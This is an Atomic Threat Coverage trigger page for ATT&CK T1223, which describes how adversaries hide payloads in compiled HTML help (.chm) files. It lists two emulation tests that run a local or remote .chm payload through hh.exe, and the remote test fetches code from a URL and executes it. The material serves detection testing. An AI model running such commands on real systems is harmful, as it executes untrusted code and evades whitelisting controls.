atomic-threat-coverage/Atomic_Threat_Coverage/Triggers/T1223.md

T1223 - Compiled HTML File

Description from ATT&CK

Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

Adversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)

Atomic Tests

• Atomic Test #1 - Compiled HTML Help Local Payload

• Atomic Test #2 - Compiled HTML Help Remote Payload

Atomic Test #1 - Compiled HTML Help Local Payload

Uses hh.exe to execute a local compiled HTML Help payload.

Supported Platforms: Windows

Inputs

Name	Description	Type	Default Value
local_chm_file	Local .chm payload	path	C:\atomic-red-team\atomics\T1223\src\T1223.chm

Run it with command_prompt!

hh.exe #{local_chm_file}

Atomic Test #2 - Compiled HTML Help Remote Payload

Uses hh.exe to execute a remote compiled HTML Help payload.

Supported Platforms: Windows

Inputs

Name	Description	Type	Default Value
remote_chm_file	Remote .chm payload	url	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1223/src/T1223.chm

Run it with command_prompt!

hh.exe #{remote_chm_file}